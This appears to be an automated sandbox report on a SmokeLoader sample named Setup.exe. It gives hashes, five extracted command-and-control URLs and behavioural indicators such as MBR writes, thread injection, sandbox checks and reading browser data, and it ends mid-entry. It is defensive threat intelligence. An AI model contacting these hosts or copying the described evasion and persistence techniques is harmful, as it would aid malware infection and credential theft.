Analysis
-
max time kernel
302s -
max time network
305s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Setup.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Setup.exe
Resource
win10v20201028
General
-
Target
Setup.exe
-
Size
4.2MB
-
MD5
afd51e2ff7beac4d0c88d8f872d6d0d5
-
SHA1
185fd4793db912410de63ac7a5a3b1ac9c266b38
-
SHA256
cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19
-
SHA512
eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418
Malware Config
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Nirsoft 6 IoCs
resource yara_rule behavioral2/files/0x000200000001ab5e-25.dat Nirsoft behavioral2/files/0x000200000001ab5e-26.dat Nirsoft behavioral2/files/0x000800000001ab5b-34.dat Nirsoft behavioral2/files/0x000800000001ab5b-33.dat Nirsoft behavioral2/files/0x000300000001a0e3-40.dat Nirsoft behavioral2/files/0x000300000001a0e3-41.dat Nirsoft -
Executes dropped EXE 11 IoCs
pid Process 2156 C0CA61A12E4C8B38.exe 2568 C0CA61A12E4C8B38.exe 3256 1615018414543.exe 2324 1615018419215.exe 2260 1615018424668.exe 1764 ThunderFW.exe 2432 MiniThunderPlatform.exe 744 23E04C4F32EF2158.exe 652 23E04C4F32EF2158.tmp 3132 seed.sfx.exe 2916 seed.exe -
resource yara_rule behavioral2/files/0x000100000001ab60-4.dat office_xlm_macros -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 11 IoCs
pid Process 2244 MsiExec.exe 2156 C0CA61A12E4C8B38.exe 2156 C0CA61A12E4C8B38.exe 2432 MiniThunderPlatform.exe 2432 MiniThunderPlatform.exe 2432 MiniThunderPlatform.exe 2432 MiniThunderPlatform.exe 2432 MiniThunderPlatform.exe 2432 MiniThunderPlatform.exe 2432 MiniThunderPlatform.exe 2916 seed.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3084 Setup.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2156 set thread context of 2424 2156 C0CA61A12E4C8B38.exe 87 PID 2156 set thread context of 2880 2156 C0CA61A12E4C8B38.exe 95 PID 2156 set thread context of 3864 2156 C0CA61A12E4C8B38.exe 97 -
Drops file in Program Files directory 37 IoCs
description ioc Process File created C:\Program Files (x86)\DTS\images\is-HI2PJ.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-1ABBJ.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-HIE5O.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\lang\is-7LMKN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-BPGA0.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-8AI0O.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-V9CVE.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File created C:\Program Files (x86)\DTS\is-SUFRA.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-PDO4S.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-5J0GH.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-VIH43.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-RKR14.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File created C:\Program Files (x86)\DTS\is-T9DCR.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-Q1CDO.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-P31NT.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259559515 seed.sfx.exe File opened for modification C:\Program Files (x86)\DTS\DreamTrip.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-JKUVD.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-BIR51.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-8MBMN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\lang\is-U447Q.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\DTS\seed.sfx.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-LQ69P.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-9OGDK.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-IP8EK.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\DTS\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-I5RU7.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-HDCLA.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-RSR6G.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\DTS\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\DTS\is-BVQNM.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-LM6R8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-28RFS.tmp 23E04C4F32EF2158.tmp -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName C0CA61A12E4C8B38.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe -
Kills process with taskkill 1 IoCs
pid Process 2748 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "jaebyob" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 